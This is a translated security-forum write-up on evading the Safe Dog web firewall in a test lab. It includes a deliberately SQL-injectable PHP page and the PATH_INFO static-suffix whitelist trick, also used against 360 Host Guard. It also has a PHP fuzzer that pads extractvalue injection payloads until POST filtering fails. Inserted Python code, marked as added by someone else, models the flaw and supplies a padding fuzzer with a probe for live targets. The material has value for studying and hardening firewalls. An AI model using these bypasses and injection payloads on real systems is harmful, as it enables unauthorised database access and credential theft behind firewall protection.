Notes on a 720-degree Thomas flair around the Dog (bypassing Safe Dog)


Author: The Somalia of a sea thief

Source: Ichunqiu

This article is part of the Ichunqiu Original Awards program; reprinting without permission is prohibited.
Preface
A few days ago, while testing a bug, I ran into Safe Dog. Having only ever done code audit, with no real-world testing experience, I got pushed around. The bypass methods I found online were mostly patched or only worked under narrow conditions; there was no good general-purpose one (of course, I may just have been searching badly). Yesterday I took some time to look specifically at how Safe Dog's logic works and ran some fuzzing, and managed to bypass both its GET and POST injection defenses. It is not particularly generic, but the ideas are worth sharing.

Body
Test environment

Windows Server 2003 Enterprise Edition Service Pack 2
Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
Website Safe Dog (Apache version) V3.5 official edition

    • 1. Main program version: 3.5.12048
    • 2. Web shell signature library version: 2016-06-29

Test code
sqlin.php:

<?php
$link = mysql_connect('localhost', 'root', 'root');
mysql_select_db('anquangou', $link);
// Deliberately injectable test page: id is concatenated straight into the query
$sql = "SELECT * FROM `user` WHERE `id` = " . $_REQUEST['id'];
echo $sql . "<br>\n";
$result = mysql_query($sql);
while ($array = mysql_fetch_assoc($result)) {
    echo "id: " . $array['id'] . "<br/>\n";
    echo "username: " . $array['username'] . "<br/>\n";
    echo "password: " . $array['password'] . "<br/>\n";
}
echo mysql_error();

Database:

# Host: localhost  (Version: 5.5.53)
# Date: 2016-11-19 17:57:30
# Generator: MySQL-Front 5.3  (Build 4.234)

/*!40101 SET NAMES utf8 */;

#
# Structure for table "admin"
#
DROP TABLE IF EXISTS `admin`;
CREATE TABLE `admin` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `admin_name` varchar(255) DEFAULT NULL,
  `admin_pass` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;

#
# Data for table "admin"
#
/*!40000 ALTER TABLE `admin` DISABLE KEYS */;
INSERT INTO `admin` VALUES (1,'admin','admin888');
/*!40000 ALTER TABLE `admin` ENABLE KEYS */;

#
# Structure for table "user"
#
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) DEFAULT NULL,
  `password` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;

#
# Data for table "user"
#
/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'user','userpass'),(2,'user2','upass2');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;


GET injection

With GET injection there are not many places to get a grip: everything is in the URL. Safe Dog does not publish its own protection rules, but it does let you add rules, and the rule syntax looks like regular expressions, so the official rules are presumably regexes too. That leaves two ways to bypass:

1. Bypass the regex match. If the pattern fails to match, the request is of course not intercepted.

2. Bypass (or disrupt) the program's logic. If the request never reaches the matching logic, nothing gets intercepted.

Regex bypass without knowing the actual rule expressions is nothing but fuzzing, trying every kind of interleaving. So I tried the second route instead.

Safe Dog works by injecting a module into the web service that grabs the HTTP request before the web service processes it, checks it against the rules, and then either hands it on to the web service for normal processing or, if it finds a problem, intercepts it and returns a custom error page.
A simple test



fakefile.php does not actually exist, but Safe Dog still intercepts the request. The same goes for .php5, .php4, .asp, .cer, .asa and so on; even a request for 111, with no extension at all, is intercepted. There are exceptions, though: common static files (.js, .jpg, .swf, .css and so on) are left alone.

You can see there is no interception prompt, just a direct 404. So Safe Dog presumably has something like a whitelist: requests with particular static-resource suffixes are not inspected and go straight to the web server. That seems harmless, but it hides a danger. Apache and IIS have PathInfo support enabled by default, so let's test that.

The request is really for PHP: the /pathinfo.css after sqlin.php is PATH_INFO. But Safe Dog appears to treat pathinfo.css as the real requested object, and because that is a static resource it simply throws the request to PHP without inspecting it.
Done, just like that? Right... was it really this easy?
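To make the whitelist defect concrete, here is an added example (my own code, not part of the original article and not Safe Dog's code): a Python model of the assumed check, which keys the static-suffix whitelist on the last path segment, beside a corrected check that finds the first segment with a script suffix and treats everything after it as PATH_INFO, the way Apache's AcceptPathInfo and IIS route the request. The suffix lists and the naive logic are assumptions reconstructed from the tests above; the corrected version also handles the /index.php/admin/ form of PATH_INFO, which the naive one mishandles in the same way.

```python
# Added example, not from the article: model of a static-suffix whitelist keyed on
# the wrong path component (assumed Safe Dog behaviour) versus a check that
# resolves the script that will actually handle the request.
from urllib.parse import urlsplit, unquote

# Suffixes the article observed being passed straight to the web server (assumed list).
STATIC_SUFFIXES = {".js", ".jpg", ".swf", ".css", ".png", ".gif"}
# Suffixes the article observed being inspected (assumed list).
SCRIPT_SUFFIXES = {".php", ".php3", ".php4", ".php5", ".asp", ".aspx", ".cer", ".asa"}


def suffix_of(segment: str) -> str:
    """Lower-cased extension of one path segment, '' if it has none."""
    dot = segment.rfind(".")
    return segment[dot:].lower() if dot >= 0 else ""


def naive_is_static(url: str) -> bool:
    """Assumed WAF logic: look only at the suffix of the LAST path segment.
    /sqlin.php/pathinfo.css is therefore classified as a stylesheet."""
    path = unquote(urlsplit(url).path)
    return suffix_of(path.rsplit("/", 1)[-1]) in STATIC_SUFFIXES


def script_target(url: str):
    """Corrected logic: walk the segments left to right and stop at the first
    one carrying a script suffix; that is the handler, the rest is PATH_INFO.
    Returns (script_path, path_info) or None when no script is addressed."""
    path = unquote(urlsplit(url).path)
    segments = path.split("/")
    for i, seg in enumerate(segments):
        if suffix_of(seg) in SCRIPT_SUFFIXES:
            script = "/".join(segments[: i + 1])
            rest = segments[i + 1:]
            path_info = "/" + "/".join(rest) if rest else ""
            return script, path_info
    return None


def hardened_is_static(url: str) -> bool:
    """Only whitelist when no script is addressed anywhere in the path."""
    return script_target(url) is None and naive_is_static(url)


def should_inspect(url: str, naive: bool) -> bool:
    """Whether the request is sent through the injection rules at all."""
    return not (naive_is_static(url) if naive else hardened_is_static(url))


if __name__ == "__main__":
    probe = "http://192.168.1.121/sqlin.php/pathinfo.css?id=1 and 1=1"
    print("naive inspects:   ", should_inspect(probe, naive=True))
    print("hardened inspects:", should_inspect(probe, naive=False))
    print("handler/PATH_INFO:", script_target(probe))
```

The point of the hardened check is that the whitelist decision has to be made on the same component the web server will dispatch on; any WAF that decides on a different view of the path than the backend can be steered with PATH_INFO, URL rewriting or encoded separators.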
        
POST injection
Reusing PathInfo does not work for POST. Normal requests for static resources are never POSTs, so there is no whitelist to hide behind: every POST request has to pass through the dog's mouth. The only option left is to fuzz it. So I wrote a POST script:

<?php
$i = 10000;
$url = 'http://192.168.1.121/sqlin.php';
for (;;) {
    $i++;
    echo "$i\n";
    // normal injection statement first, then an ever-longer padding string
    $payload = 'id=-1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) and 1=' . str_repeat('3', $i);
    $ret = DoPost($url, $payload);
    if (strpos($ret, 'website firewall') === false) {
        echo "done!\n" . strlen($payload) . "\n" . $ret;
        die();
    }
}

function DoPost($url, $data = '')
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $return = curl_exec($ch);
    curl_close($ch);
    return $return;
}


This appends an extra-long string after a normal injection statement. It ran for a long time without ever getting through. So I changed the script to put the extra-long string in the middle instead:

$payload = 'id=-1 and 1=' . str_repeat('3', $i) . ' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))';

Run.

WTF, done again just like that? Let's try it in the browser.
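The same padding search as the PHP script above, as an added Python example that is my own code, not the article's, with the HTTP call factored out so the loop can be pointed at a mock. The mock WAF inspects only the first INSPECT_LIMIT bytes of the body; that mechanism is an assumption (the article does not establish why padding in the middle works while padding at the tail does not), chosen because it reproduces the observation. real_probe is the counterpart of the script's DoPost for use against a live target, and the block marker, limit and rule regex are all constructed values.

```python
# Added example, not from the article: padding-position fuzzer with a pluggable
# probe, plus a constructed mock WAF whose inspection buffer is truncated.
import re
from typing import Callable, Optional

INJECTION = "(extractvalue(1,concat(0x7e,(select user()),0x7e)))"
BLOCK_MARKER = "website firewall"   # the string the article's script checks for


def build_payload(pad_len: int, position: str) -> str:
    """Same two payload shapes as the article: padding at the tail or in the middle."""
    pad = "3" * pad_len
    if position == "tail":
        return "id=-1 and " + INJECTION + " and 1=" + pad
    if position == "middle":
        return "id=-1 and 1=" + pad + " and " + INJECTION
    raise ValueError(position)


def find_bypass(probe: Callable[[str], str], position: str,
                start: int = 10000, limit: int = 20000, step: int = 1) -> Optional[int]:
    """Grow the padding until the probe's response no longer carries the
    block page.  Returns the padding length that got through, or None."""
    for pad_len in range(start, limit, step):
        if BLOCK_MARKER not in probe(build_payload(pad_len, position)):
            return pad_len
    return None


# ---- constructed mock of WAF + backend; the mechanism is an assumption ----
INSPECT_LIMIT = 16384                              # assumed fixed inspection buffer
RULE = re.compile(r"extractvalue\s*\(", re.IGNORECASE)  # stand-in for a vendor rule


def mock_probe(body: str) -> str:
    """Apply the rule to the first INSPECT_LIMIT bytes only; return the block
    page on a hit, otherwise what the vulnerable sqlin.php would echo back."""
    if RULE.search(body[:INSPECT_LIMIT]):
        return "<h1>website firewall</h1>"
    return "SELECT * FROM `user` WHERE `id` = " + body[len("id="):]


def real_probe(url: str) -> Callable[[str], str]:
    """Build a probe that really POSTs the body to url (equivalent of DoPost)."""
    import urllib.request

    def probe(body: str) -> str:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return probe


if __name__ == "__main__":
    # Against the mock: tail padding never escapes the inspected prefix,
    # middle padding does once it pushes the injection past INSPECT_LIMIT.
    print("tail  :", find_bypass(mock_probe, "tail", step=500))
    print("middle:", find_bypass(mock_probe, "middle", step=500))
    # To run the article's experiment for real:
    # print(find_bypass(real_probe("http://192.168.1.121/sqlin.php"), "middle"))
```

Whatever the real cause inside Safe Dog, the harness makes the useful measurement explicit: the smallest padding that gets through, and whether it depends on where the padding sits. Against a WAF with a bounded inspection buffer the tail-padded payload can never win, because the part the rule matches on is always inside the buffer; the middle-padded one wins as soon as the injection lands past the limit, which is exactly the asymmetry the article saw.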


I had only just taken my pants off, and you tell me it's already over.

Postscript

In practice the testing process was more complicated than this; for lack of time I picked out only the steps that succeeded to write up. PathInfo is a very easy thing to overlook. Along the way I also tested 360 Host Guard, which has the same problem. 360 Host Guard additionally ships with a whitelist along the lines of the DedeCMS admin area (back-end operations are not defended), so a URL of the following form gets through:
http://example.com/index.php/admin/?id=sql injection

More security technology, good quality, white hat hack big guy in: http://bbs.ichunqiu.com/portal.php

